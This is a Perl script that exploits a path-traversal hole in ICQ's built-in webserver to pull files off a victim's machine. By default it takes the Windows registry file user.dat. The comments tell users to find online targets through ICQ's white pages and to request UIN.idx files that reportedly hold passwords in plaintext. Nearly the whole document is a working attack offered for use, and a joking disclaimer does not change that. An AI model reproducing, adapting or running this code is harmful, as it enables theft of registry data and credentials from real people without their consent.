#!/usr/bin/perl

#
# coded, (i.e. slapped together in a lazy-ass way) by Dr. Labrat
#

# Disclamer: If you use this to F*ck someone up, you are a bad, bad person. It wasn't me.
# You are on your own.

#Use this to be a nosey git on the net....
#defaults to getting the windoze registry from a luser running ICQ's lame webserver
#
#Use www.icq.com to browse for people that are online i.e. use the whitepages, and look for little green houses.....
#
#Then pass the IP address of the victim on the commandline
#
#change the $url var to point to any other known file.
#change $dest to point to the fliename you want it saved to.
#the url is relative to the ICQ directory, i.e. ".." is up one directory...
#
#other interesting urls to try are "......../db/UIN.idx"
#where UIN is the victim's UIN#
#
#even better (but rare) is:
#
# "......../NewDB/UIN.idx" 
#
# which contains the victim's password in PLAINTEXT after the string 
# "iUserSound"

#thanx to Shadow51
#and Delta

# Thought for the day: Using this makes you a script-kiddie.

$ipaddr=$ARGV[0];
$iaddr= gethostbyname("$ipaddr");

$url = "/.html/......../windows/user.dat";
$dest = "user.dat";

use IO::Socket;
use IO::Handle;

$port = 80;


$proto = getprotobyname("tcp");
$paddr = sockaddr_in($port, $iaddr);


print "Lame ICQ webserver filegetter, by Dr. Labrat\n";


socket(DATA, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
connect(DATA, $paddr) or die "Connect error: $!";
autoflush DATA 1;

print "Connected to $ipaddr...\n";
print "Trying to get: $url\n";

print DATA "GET $url HTTP/1.0\r\n\r\n\r\n";

@data=<DATA>;

print "\n$data[0]\n";

if ( $data[0]=~/OK/){
	print "Got $url OK\nWriting to $dest\n";
} else {
	die "Could not get $url\n"
}

open (DEST, ">$dest");
$counter=0;
foreach $chunk (@data) {
	$counter++;
	if ( $chunk=~/Content-type/) {
	print "skipping header\n";
	$counter++;
	$counter++;
	last;
	}
}

while ($counter){

	shift(@data);
	$counter--;
}

print DEST @data;	

print "Done....\n";

close DATA;
close DEST;